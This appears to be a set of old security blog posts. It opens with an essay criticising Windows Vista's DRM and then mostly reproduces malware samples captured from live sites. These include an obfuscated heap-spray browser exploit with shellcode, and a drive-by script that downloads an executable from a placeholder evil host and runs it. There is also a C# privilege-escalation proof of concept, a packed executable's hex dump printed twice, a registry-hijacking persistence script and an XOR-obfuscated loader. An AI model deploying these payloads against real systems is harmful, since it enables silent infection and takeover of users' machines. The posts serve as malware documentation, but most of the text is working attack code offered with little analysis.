Zeroday 01100100011010010

[editors note: this is becoming far too long a post for a single entry and will be serialized over the coming week]

In a controversial technical analysis Peter Gutmann goes into fantastic detail about the recently released Vista operating system and it’s content protection scheme. One thing became clear to me after reading this analysis. Vista is being marketed to content producers, not consumers. If Windows XP was Microsoft’s attempt to embed a browser into the operating system then Vista is the attempt to embed DRM. Digital Rights Management technology has been applied to literally every ring of the OS architecture.

Vista’s target market is content producers and the underlying philosophy of the user experience will be far different then what many consumers expect it will be. Microsoft has attempted to plug the infamous “analog hole” as much as is possible by forcing all data through encryption algorithms. For those unaware of the “costs” of encryption it is sufficiently high. Pushing HD audio and video content through encryption/decryption routines is a tremendous strain on any system currently available and in the near future. Even with the application of Moore’s Law a conservative estimate could place affordable and usable systems within this new content system 5 years away. It will be interesting to see how these restrictions will be spun by the large marketing and PR teams since none of these innovations will benefit consumers in any way. The job that has been handed to these PR and marketing teams is to dress up a product designed with every restriction a producer has asked for and make a consumer want to buy it. One of the most quotable lines from the Gutmann analysis sums this up perfectly as, “breaking the legs of Olympic athletes and then rating them based on how fast they can hobble on crutches.”

In the past when I have delivered lectures to web application developers I would caution them to never trust user input. Perhaps developers took this philosophy a little too far. The entire operating system now seems to have turned against the user. Zero tolerance drivers and regulation code will lock the system down if any type of deviance is detected. So called “tilt bits” will signal an attack on the system if anything is found out of the ordinary. These changes won’t enhance user security unfortunately as they were designed to protect only “premium content”. Medical data, credit card numbers, and other private things that do deserve this level of protection are completly ignored. Untrusting of any environmental changes the system will shut down or degrade performance in response to a perceived attack.

This is a marked turn from the past versions of the Microsoft operating system. In the past one could take a hard drive from a Windows OS and drop it into an entirely different system. The new hardware would be detected and drivers applied on the spot. At most a single reboot would bring the user back into a usable system. This type of resilience was what impressed me during the early days of the new Windows architecture. In those days Microsoft was fairly dominant but still pursuing new customers. The new Vista scheme signals to me that they have exhausted new customer acquisition and are now focused on milking their existing market.

In the next post I will look at who benefits (Intel, Hollywood, code obfuscation providers) and who doesn’t (consumers) and some security issues (driver revocations for DDOS)

I’ve enclosed the code in a text box to make reading it a little easier. This code was found on a live site that is using the exploit via iframes to infect drive by downloaders. Extra br tags are a result of the blog software….

<br /> <script><br /> t=”60,83,67,82,73,80,84,32,108,97,110,103,117,97,103,101,61,74,97,118,97,83,99,114,105,112,116,62,104,72,72,67,116,114,108,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,34,73,110,116,101,114,110,101,116,46,72,72,67,116,114,108,46,49,34,41,59,13,10,118,97,114,32,101,118,105,108,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,48,48,48,98,37,117,48,48,48,98,37,117,48,48,48,98,37,117,48,48,48,98,34,41,59,13,10,118,97,114,32,73,109,97,103,101,115,32,61,32,34,65,99,116,105,118,101,88,46,34,32,43,32,101,118,105,108,32,43,32,34,82,116,108,65,108,108,111,99,97,116,101,72,101,97,112,82,116,108,67,114,101,97,116,101,72,101,97,112,34,59,13,10,118,97,114,32,99,111,117,110,116,32,61,32,48,59,118,97,114,32,109,97,120,99,111,117,110,116,32,61,32,49,48,59,102,117,110,99,116,105,111,110,32,67,108,105,99,107,84,111,40,41,123,32,104,72,72,67,116,114,108,46,73,109,97,103,101,32,61,32,73,109,97,103,101,115,59,125,13,10,102,117,110,99,116,105,111,110,32,71,111,116,73,116,40,41,123,32,99,111,117,110,116,43,43,59,32,105,102,40,99,111,117,110,116,32,60,32,109,97,120,99,111,117,110,116,41,32,123,32,32,120,46,111,110,99,108,105,99,107,40,41,59,32,32,71,111,116,73,116,40,41,59,32,125,125,13,10,102,117,110,99,116,105,111,110,32,66,117,105,108,100,67,111,110,116,101,120,116,40,41,123,32,112,97,121,108,111,97,100,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,57,48,57,48,37,117,54,48,57,48,37,117,49,55,101,98,37,117,54,52,53,101,37,117,51,48,97,49,37,117,48,48,48,48,37,117,48,53,48,48,37,117,48,56,48,48,37,117,48,48,48,48,37,117,102,56,56,98,37,117,48,48,98,57,37,117,48,48,48,52,37,117,102,51,48,48,37,117,102,102,97,52,37,117,101,56,101,48,37,117,102,102,101,52,37,117,102,102,102,102,37,117,97,49,54,52,37,117,48,48,51,48,37,117,48,48,48,48,37,117,52,48,56,98,37,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,97,100,37,117,48,56,55,48,37,117,101,99,56,49,37,117,48,50,48,48,37,117,48,48,48,48,37,117,101,99,56,98,37,117,101,56,98,98,37,117,48,50,48,102,37,117,56,98,48,48,37,117,56,53,48,51,37,117,48,102,99,48,37,117,98,98,56,53,37,117,48,48,48,48,37,117,102,102,48,48,37,117,101,57,48,51,37,117,48,50,50,49,37,117,48,48,48,48,37,117,56,57,53,98,37,117,50,48,53,100,37,117,54,56,53,54,37,117,102,101,57,56,37,117,48,101,56,97,37,117,98,49,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,99,52,53,37,117,54,56,53,54,37,117,52,101,56,101,37,117,101,99,48,101,37,117,97,51,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,52,52,53,37,117,54,56,53,54,37,117,55,57,99,49,37,117,98,56,101,53,37,117,57,53,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,99,52,53,37,117,54,56,53,54,37,117,99,54,49,98,37,117,55,57,52,54,37,117,56,55,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,48,52,53,37,117,54,56,53,54,37,117,102,99,97,97,37,117,55,99,48,100,37,117,55,57,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,48,56,52,53,37,117,54,56,53,54,37,117,56,52,101,55,37,117,98,52,54,57,37,117,54,98,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,49,52,52,53,37,117,101,48,98,98,37,117,48,50,48,102,37,117,56,57,48,48,37,117,51,51,48,51,37,117,99,55,102,54,37,117,50,56,52,53,37,117,53,50,53,53,37,117,52,100,52,99,37,117,52,53,99,55,37,117,52,102,50,99,37,117,48,48,52,101,37,117,56,100,48,48,37,117,50,56,53,100,37,117,102,102,53,51,37,117,48,52,53,53,37,117,54,56,53,48,37,117,49,97,51,54,37,117,55,48,50,102,37,117,51,102,101,56,37,117,48,48,48,48,37,117,56,57,48,48,37,117,50,52,52,53,37,117,55,102,54,97,37,117,53,100,56,100,37,117,53,51,50,56,37,117,53,53,102,102,37,117,99,55,49,99,37,117,48,53,52,52,37,117,53,99,50,56,37,117,54,53,50,101,37,117,99,55,55,56,37,117,48,53,52,52,37,117,54,53,50,99,37,117,48,48,48,48,37,117,53,54,48,48,37,117,56,100,53,54,37,117,50,56,55,100,37,117,102,102,53,55,37,117,50,48,55,53,37,117,102,102,53,54,37,117,50,52,53,53,37,117,53,55,53,54,37,117,53,53,102,102,37,117,101,56,48,99,37,117,48,48,54,50,37,117,48,48,48,48,37,117,99,52,56,49,37,117,48,50,48,48,37,117,48,48,48,48,37,117,51,51,54,49,37,117,99,50,99,48,37,117,48,48,48,52,37,117,56,98,53,53,37,117,53,49,101,99,37,117,56,98,53,51,37,117,48,56,55,100,37,117,53,100,56,98,37,117,53,54,48,99,37,117,55,51,56,98,37,117,56,98,51,99,37,117,49,101,55,52,37,117,48,51,55,56,37,117,53,54,102,51,37,117,55,54,56,98,37,117,48,51,50,48,37,117,51,51,102,51,37,117,52,57,99,57,37,117,97,100,52,49,37,117,99,51,48,51,37,117,51,51,53,54,37,117,48,102,102,54,37,117,49,48,98,101,37,117,102,50,51,97,37,117,48,56,55,52,37,117,99,101,99,49,37,117,48,51,48,100,37,117,52,48,102,50,37,117,102,49,101,98,37,117,102,101,51,98,37,117,55,53,53,101,37,117,53,97,101,53,37,117,101,98,56,98,37,117,53,97,56,98,37,117,48,51,50,52,37,117,54,54,100,100,37,117,48,99,56,98,37,117,56,98,52,98,37,117,49,99,53,97,37,117,100,100,48,51,37,117,48,52,56,98,37,117,48,51,56,98,37,117,53,101,99,53,37,117,53,57,53,98,37,117,99,50,53,100,37,117,48,48,48,56,37,117,57,50,101,57,37,117,48,48,48,48,37,117,53,101,48,48,37,117,56,48,98,102,37,117,48,50,48,99,37,117,98,57,48,48,37,117,48,49,48,48,37,117,48,48,48,48,37,117,97,52,102,51,37,117,101,99,56,49,37,117,48,49,48,48,37,117,48,48,48,48,37,117,102,99,56,98,37,117,99,55,56,51,37,117,99,55,49,48,37,117,54,101,48,55,37,117,54,52,55,52,37,117,99,55,54,99,37,117,48,52,52,55,37,117,48,48,54,99,37,117,48,48,48,48,37,117,102,102,53,55,37,117,48,52,53,53,37,117,52,53,56,57,37,117,99,55,50,52,37,117,53,50,48,55,37,117,54,99,55,52,37,117,99,55,52,49,37,117,48,52,52,55,37,117,54,99,54,99,37,117,54,51,54,102,37,117,52,55,99,55,37,117,54,49,48,56,37,117,54,53,55,52,37,117,99,55,52,56,37,117,48,99,52,55,37,117,54,49,54,53,37,117,48,48,55,48,37,117,53,48,53,55,37,117,53,53,102,102,37,117,56,98,48,56,37,117,98,56,102,48,37,117,48,102,101,52,37,117,48,48,48,50,37,117,51,48,56,57,37,117,48,55,99,55,37,117,55,51,54,100,37,117,54,51,55,54,37,117,52,55,99,55,37,117,55,50,48,52,37,117,48,48,55,52,37,117,53,55,48,48,37,117,53,53,102,102,37,117,56,98,48,52,37,117,51,99,52,56,37,117,56,99,56,98,37,117,56,48,48,56,37,117,48,48,48,48,37,117,51,57,48,48,37,117,48,56,51,52,37,117,48,52,55,52,37,117,102,57,101,50,37,117,49,50,101,98,37,117,51,52,56,100,37,117,53,53,48,56,37,117,52,48,54,97,37,117,48,52,54,97,37,117,102,102,53,54,37,117,49,48,53,53,37,117,48,54,99,55,37,117,48,99,56,48,37,117,48,48,48,50,37,117,99,52,56,49,37,117,48,49,48,48,37,117,48,48,48,48,37,117,101,56,99,51,37,117,102,102,54,57,37,117,102,102,102,102,37,117,48,52,56,98,37,117,53,51,50,52,37,117,53,50,53,49,37,117,53,55,53,54,37,117,101,99,98,57,37,117,48,50,48,102,37,117,56,98,48,48,37,117,56,53,49,57,37,117,55,53,100,98,37,117,51,51,53,48,37,117,51,51,99,57,37,117,56,51,100,98,37,117,48,54,101,56,37,117,98,55,48,102,37,117,56,49,49,56,37,117,102,102,102,98,37,117,48,48,49,53,37,117,55,53,48,48,37,117,56,51,51,101,37,117,48,54,101,56,37,117,98,55,48,102,37,117,56,49,49,56,37,117,102,102,102,98,37,117,48,48,51,53,37,117,55,53,48,48,37,117,56,51,51,48,37,117,48,50,101,56,37,117,98,55,48,102,37,117,56,51,49,56,37,117,54,97,102,98,37,117,50,53,55,53,37,117,99,48,56,51,37,117,56,98,48,52,37,117,98,56,51,48,37,117,48,102,101,48,37,117,48,48,48,50,37,117,48,48,54,56,37,117,48,48,48,48,37,117,54,56,48,49,37,117,49,48,48,48,37,117,48,48,48,48,37,117,48,48,54,97,37,117,49,48,102,102,37,117,48,54,56,57,37,117,52,52,56,57,37,117,49,56,50,52,37,117,101,99,98,57,37,117,48,50,48,102,37,117,102,102,48,48,37,117,53,102,48,49,37,117,53,97,53,101,37,117,53,98,53,57,37,117,101,52,98,56,37,117,48,50,48,102,37,117,102,102,48,48,37,117,101,56,50,48,37,117,102,100,100,97,37,117,102,102,102,102,34,41,59,13,10,104,111,109,101,61,117,110,101,115,99,97,112,101,40,34,37,117,55,52,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,117,54,51,50,102,37,117,54,49,54,57,37,117,54,54,50,101,37,117,54,57,54,50,37,117,54,102,50,101,37,117,54,55,55,50,37,117,54,51,50,101,37,117,50,102,54,101,37,117,55,51,54,51,37,117,50,101,54,101,37,117,55,56,54,53,37,117,48,48,54,53,37,117,48,48,48,48,34,41,59,13,10,114,117,110,110,97,98,108,101,32,61,32,112,97,121,108,111,97,100,43,104,111,109,101,59,32,115,107,105,112,112,101,114,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,56,52,56,37,117,52,56,52,56,34,41,59,13,10,119,104,105,108,101,32,40,115,107,105,112,112,101,114,46,108,101,110,103,116,104,60,50,48,43,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,32,123,32,32,115,107,105,112,112,101,114,43,61,115,107,105,112,112,101,114,59,32,125,13,10,115,107,105,112,112,101,114,49,32,61,32,115,107,105,112,112,101,114,46,115,117,98,115,116,114,105,110,103,40,48,44,32,50,48,43,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,59,13,10,115,107,105,112,112,101,114,50,32,61,32,115,107,105,112,112,101,114,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,107,105,112,112,101,114,46,108,101,110,103,116,104,45,50,48,45,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,59,13,10,119,104,105,108,101,40,115,107,105,112,112,101,114,50,46,108,101,110,103,116,104,60,40,48,120,52,48,48,48,48,45,50,48,45,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,41,32,123,32,32,115,107,105,112,112,101,114,50,32,43,61,32,115,107,105,112,112,101,114,50,59,13,10,115,107,105,112,112,101,114,50,32,43,61,32,115,107,105,112,112,101,114,49,59,32,125,32,99,111,110,116,101,120,116,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,32,105,105,61,45,49,59,32,119,104,105,108,101,40,43,43,105,105,60,51,48,48,41,13,10,123,32,32,99,111,110,116,101,120,116,91,105,105,93,32,61,32,115,107,105,112,112,101,114,50,32,43,32,114,117,110,110,97,98,108,101,59,32,125,32,71,111,116,73,116,40,41,59,125,102,117,110,99,116,105,111,110,32,116,101,115,116,40,41,123,32,97,108,101,114,116,40,41,59,125,60,47,83,67,82,73,80,84,62″<br /> t=eval(“String.fromCharCode(“+t+”)”);<br /> document.write(t);<br /> </script><br /> </HEAD><BODY onload=BuildContext();><br /> <BUTTON id=x onclick=ClickTo();><br /> </BUTTON><br />

The exploit used is fairly old. One other important thing to note is that the CLSID used here is a Microsoft database control.

[zero@day testing]$ curl http://EVIL_SITE/db/wm.htm
<script>
var url,path;
url="http://EVIL_SITE/mc/game/db.exe";
path="C:\\boot.exe";
try{
var ado=(document.createElement("object"));
var d=1;
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e=1;
var xml=ado.CreateObject("Microsoft.XMLHTTP","");
var f=1;
var ab="Adodb.";
var cd="Stream";
var g=1;
var as=ado.createobject(ab+cd,"");
var h=1;
xml.Open("GET",url,0);
xml.Send();
as.type=1;
var n=1;
as.open();
as.write(xml.responseBody);
as.savetofile(path,2);
as.close();
var shell=ado.createobject("Shell.Application","");
shell.ShellExecute(path,"","","open",0);
}
catch(e){}
;</script>

Feel free to send 50k to my paypal account :)

Russian sites are starting to post proof of concept code now. I had little idea of how trivial this exploit would be to understand but it would seem that error message parameters are used to elevate privledges. If the MB_SERVICE_NOTIFICATION flag is specified when calling the MessageBox function from the Windows API, it will use the NtRaiseHardError syscall to send a HardError message to CSRSS.

// Вариант на C#
// mbox.cs
using System;
using System.Runtime.InteropServices;
class HelloWorldFromMicrosoft
{
[DllImport("user32.dll")]
unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);

static unsafe void Main()
{
byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
uint MB_SERVICE_NOTIFICATION = 0x00200000u;
fixed(byte* pHelloBug = &helloBug[0])
{
for(int i=0; i> csc /unsafe mbox.cs
>> mbox.exe

the original exploit code found was impossible to enter into this blog so I’m uploading a picture of it.

For those who were not able to attend the Digital disobedience event on cyberactivism and culture jamming a video has been produced and hosted by the Berkman Center. It was a great time and I can’t thank them all enough for coming to us.

0000000 4d5a 9000 0300 0000 0400 0000 5045 0000
0000010 4c01 0200 4653 4721 0000 0000 0000 0000
0000020 e000 0f01 0b01 0000 0002 0000 0016 0000
0000030 0000 0000 b351 0000 0010 0000 0c00 0000
0000040 0000 4000 0010 0000 0002 0000 0400 0000
0000050 0000 0000 0400 0000 0000 0000 0060 0000
0000060 0002 0000 0000 0000 0200 0000 0000 1000
0000070 0010 0000 0000 1000 0010 0000 0000 0000
0000080 1000 0000 0000 0000 0000 0000 7852 0000
0000090 3400 0000 0000 0000 0000 0000 0000 0000
00000a0 0000 0000 0000 0000 0000 0000 0000 0000
*
0000100 0000 0000 0000 0000 7400 0000 0040 0000
0000110 0010 0000 0000 0000 0000 0000 0000 0000
0000120 0000 0000 0000 0000 e000 00c0 0000 0000
0000130 7461 0000 0010 0000 0050 0000 ac02 0000
0000140 0002 0000 0000 0000 0000 0000 0000 0000
0000150 e000 00c0 4b45 524e 454c 3332 2e64 6c6c
0000160 0000 004c 6f61 644c 6962 7261 7279 4100
0000170 0047 6574 5072 6f63 4164 6472 6573 7300
0000180 0000 0000 0000 0000 0000 0000 0000 0000
0000190 0000 0000 0000 0000 6e52 4000 6252 4000
00001a0 6452 4000 9801 4000 0010 4000 0050 4000
00001b0 0130 4000 0000 0000 d420 4000 0100 0000
00001c0 a052 4000 0000 0000 0000 0000 0000 0000
00001d0 0000 0000 0000 0000 0000 0000 0000 0000
*
0000200 5501 8bec 81c4 f0f7 ffc4 8d45 07f8 50e8
0000210 1801 0e1e de75 4368 7930 4087 539c 3a38
0000220 0ae8 ee22 0083 c40c 8d85 60f8 4950 68d0
0000230 07cf 1ee8 7a28 121e 1916 e8d3 3423 6a04
0000240 6610 8462 0818 e8f0 9115 20ed 038c 0d01
0000250 681d 80ac 3044 9f83 f7e8 7463 34a3 84d2
0000260 5b3a 04f2 3582 0ce8 a8ac 3652 f084 c176
0000270 689e 4240 581b 878a 190b 5810 6681 3da0
0000280 1d4d 5a34 7510 be62 5a6f 25eb 29ae f93d
0000290 871d c9c2 0403 33cc 40fe 370f dc2a bd28
00002a0 280a 4205 2151 0afb fe2a 1119 3ccc 8d25
00002b0 3420 ddd9 0852 060c 1910 0c14 8643 1870
00002c0 86f7 0c24 8643 1c21 0490 2c60 0068 7174
00002d0 1c70 3a2f 4738 312e 2737 1e8c 330c 357e
00002e0 3407 7370 325f 7540 6461 7465 f66c 766f
00002f0 f02e ee78 f3c2 9528 6fb4 29ae 1e66 6f7b
0000300 3f2e be68 f03c 256c d430 5cc0 0001 1c34
0000310 2040 0075 7365 7233 321c 2e64 6c78 3d79
0000320 bd70 8369 6e74 6641 8301 8635 6f6b 32bc
0000330 d46c 1ccf 49a7 7454 d06d 7050 61ee 68c7
0000340 3e6e 73d3 7263 6114 1245 6c6f 9e7e 489b
0000350 6e44 b618 7a72 df26 4d46 6916 bb30 6f70
0000360 b50c 8747 787f 6150 726f 63fd 73c6 8646
0000370 53cc c334 6d54 699e 36f3 4421 1c0a 1859
0000380 ee45 78f6 63e1 8ac6 6164 1538 3455 5205
0000390 0850 6f50 9087 4090 2c89 75e0 6c6d 7f6f
00003a0 a68e 0f57 524c 446f 779b fc3c 5e54 5267
00003b0 3002 00be a401 4000 ad93 ad97 ad56 96b2
00003c0 80a4 b680 ff13 73f9 33c9 ff13 7316 33c0
00003d0 ff13 731f b680 41b0 10ff 1312 c073 fa75
00003e0 3caa ebe0 ff53 0802 f683 d901 750e ff53
00003f0 04eb 26ac d1e8 742f 13c9 eb1a 9148 c1e0
0000400 08ac ff53 043d 007d 0000 730a 80fc 0573
0000410 0683 f87f 7702 4141 958b c5b6 0056 8bf7
0000420 2bf0 f3a4 5eeb 9d8b d65e ad48 740a 7902
0000430 ad50 568b f297 eb87 ad93 5e46 ad97 56ff
0000440 1395 ac84 c075 fbfe 0e74 f079 0546 ad50
0000450 eb09 fe0e 0f84 8bbe ffff 5655 ff53 04ab
0000460 ebe0 33c9 41ff 1313 c9ff 1372 f8c3 02d2
0000470 7505 8a16 4612 d2c3 a052 0000 0000 0000
0000480 0000 0000 5401 0000 a052 0000 0000 0000
0000490 0000 0000 0000 0000 0000 0000 0000 0000
00004a0 6101 0000 6f01 0000 0000 0000 0000 0000
00004b0

0000000 4d5a 9000 0300 0000 0400 0000 5045 0000
0000010 4c01 0200 4653 4721 0000 0000 0000 0000
0000020 e000 0f01 0b01 0000 0002 0000 0016 0000
0000030 0000 0000 b351 0000 0010 0000 0c00 0000
0000040 0000 4000 0010 0000 0002 0000 0400 0000
0000050 0000 0000 0400 0000 0000 0000 0060 0000
0000060 0002 0000 0000 0000 0200 0000 0000 1000
0000070 0010 0000 0000 1000 0010 0000 0000 0000
0000080 1000 0000 0000 0000 0000 0000 7852 0000
0000090 3400 0000 0000 0000 0000 0000 0000 0000
00000a0 0000 0000 0000 0000 0000 0000 0000 0000
*
0000100 0000 0000 0000 0000 7400 0000 0040 0000
0000110 0010 0000 0000 0000 0000 0000 0000 0000
0000120 0000 0000 0000 0000 e000 00c0 0000 0000
0000130 7461 0000 0010 0000 0050 0000 ac02 0000
0000140 0002 0000 0000 0000 0000 0000 0000 0000
0000150 e000 00c0 4b45 524e 454c 3332 2e64 6c6c
0000160 0000 004c 6f61 644c 6962 7261 7279 4100
0000170 0047 6574 5072 6f63 4164 6472 6573 7300
0000180 0000 0000 0000 0000 0000 0000 0000 0000
0000190 0000 0000 0000 0000 6e52 4000 6252 4000
00001a0 6452 4000 9801 4000 0010 4000 0050 4000
00001b0 0130 4000 0000 0000 d420 4000 0100 0000
00001c0 a052 4000 0000 0000 0000 0000 0000 0000
00001d0 0000 0000 0000 0000 0000 0000 0000 0000
*
0000200 5501 8bec 81c4 f0f7 ffc4 8d45 07f8 50e8
0000210 1801 0e1e de75 4368 7930 4087 539c 3a38
0000220 0ae8 ee22 0083 c40c 8d85 60f8 4950 68d0
0000230 07cf 1ee8 7a28 121e 1916 e8d3 3423 6a04
0000240 6610 8462 0818 e8f0 9115 20ed 038c 0d01
0000250 681d 80ac 3044 9f83 f7e8 7463 34a3 84d2
0000260 5b3a 04f2 3582 0ce8 a8ac 3652 f084 c176
0000270 689e 4240 581b 878a 190b 5810 6681 3da0
0000280 1d4d 5a34 7510 be62 5a6f 25eb 29ae f93d
0000290 871d c9c2 0403 33cc 40fe 370f dc2a bd28
00002a0 280a 4205 2151 0afb fe2a 1119 3ccc 8d25
00002b0 3420 ddd9 0852 060c 1910 0c14 8643 1870
00002c0 86f7 0c24 8643 1c21 0490 2c60 0068 7174
00002d0 1c70 3a2f 4738 312e 2737 1e8c 330c 357e
00002e0 3407 7370 325f 7540 6461 7465 f66c 766f
00002f0 f02e ee78 f3c2 9528 6fb4 29ae 1e66 6f7b
0000300 3f2e be68 f03c 256c d430 5cc0 0001 1c34
0000310 2040 0075 7365 7233 321c 2e64 6c78 3d79
0000320 bd70 8369 6e74 6641 8301 8635 6f6b 32bc
0000330 d46c 1ccf 49a7 7454 d06d 7050 61ee 68c7
0000340 3e6e 73d3 7263 6114 1245 6c6f 9e7e 489b
0000350 6e44 b618 7a72 df26 4d46 6916 bb30 6f70
0000360 b50c 8747 787f 6150 726f 63fd 73c6 8646
0000370 53cc c334 6d54 699e 36f3 4421 1c0a 1859
0000380 ee45 78f6 63e1 8ac6 6164 1538 3455 5205
0000390 0850 6f50 9087 4090 2c89 75e0 6c6d 7f6f
00003a0 a68e 0f57 524c 446f 779b fc3c 5e54 5267
00003b0 3002 00be a401 4000 ad93 ad97 ad56 96b2
00003c0 80a4 b680 ff13 73f9 33c9 ff13 7316 33c0
00003d0 ff13 731f b680 41b0 10ff 1312 c073 fa75
00003e0 3caa ebe0 ff53 0802 f683 d901 750e ff53
00003f0 04eb 26ac d1e8 742f 13c9 eb1a 9148 c1e0
0000400 08ac ff53 043d 007d 0000 730a 80fc 0573
0000410 0683 f87f 7702 4141 958b c5b6 0056 8bf7
0000420 2bf0 f3a4 5eeb 9d8b d65e ad48 740a 7902
0000430 ad50 568b f297 eb87 ad93 5e46 ad97 56ff
0000440 1395 ac84 c075 fbfe 0e74 f079 0546 ad50
0000450 eb09 fe0e 0f84 8bbe ffff 5655 ff53 04ab
0000460 ebe0 33c9 41ff 1313 c9ff 1372 f8c3 02d2
0000470 7505 8a16 4612 d2c3 a052 0000 0000 0000
0000480 0000 0000 5401 0000 a052 0000 0000 0000
0000490 0000 0000 0000 0000 0000 0000 0000 0000
00004a0 6101 0000 6f01 0000 0000 0000 0000 0000
00004b0


I found this amusing today. It is a javascript that was linked to a lotto information page. It changed some rather important registry keys

I’ve broken up some of the lines of code to make it fit this blog theme.

var url = "http://EVIL_SITE";
var burl = "http://EVIL_SITE";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\system32\\EVIL.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\RunOnce\\Windows",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run\\System32",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url2","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url3","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url4","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url5","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url6","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url7","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url8","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url9","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url10","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url11","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Calendar\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Games\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Launchcast\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Weather\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\
YMSGR_Weather\\content url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Internet Settings\\ZoneMap\Domains\\EVIL_SITE\\*",4,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\
CurrentVersion\\Policies\\System\\DisableRegistryTools",1,
"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Policies\\Microsoft\\
Internet Explorer\\Control Panel\\Homepage",1,"REG_DWORD");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\window title","-� EVIL_SITE �-");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\default_page_url","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\First Home Page","http://EVIL_SITE");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Save_Session_History_On_Exit","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Toolbar\\LinksFolderName",".::EVIL_SITE::. ");


This is a random javascript snippet I found today which I will analyze later. Just recording for posterity.

<script language="JavaScript">e = '0x00' + '27';str1 = "%9C%C4%CF%D2%B8%D5%D4%DF%
CC%C3%9B%86%D2%CF%D5%CF%C6%CF%CC%CF%D4%DF%9E%C0%CF%C4%C4%C3%CA%86%9A%9C%
CF%C2%D6%C7%CB%C3%B8%D5%D6%C5%9B%86%C0%D4%D4%C8%9E%89%89%C1%D6%C3%D4%C7%
C6%C5%8A%C5%C9%CB%89%D4%D6%C2%89%86%B8%D1%CF%C4%D4%C0%9B%97%B8%C0%C3%CF%
C1%C0%D4%9B%97%9A%9C%89%CF%C2%D6%C7%CB%C3%9A%9C%89%C4%CF%D2%9A";
str=tmp='';
for(i=0;i<str1.length;i+=3)
{tmp = unescape(str1.slice(i,i+3));
str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}
document.write(str);</script>

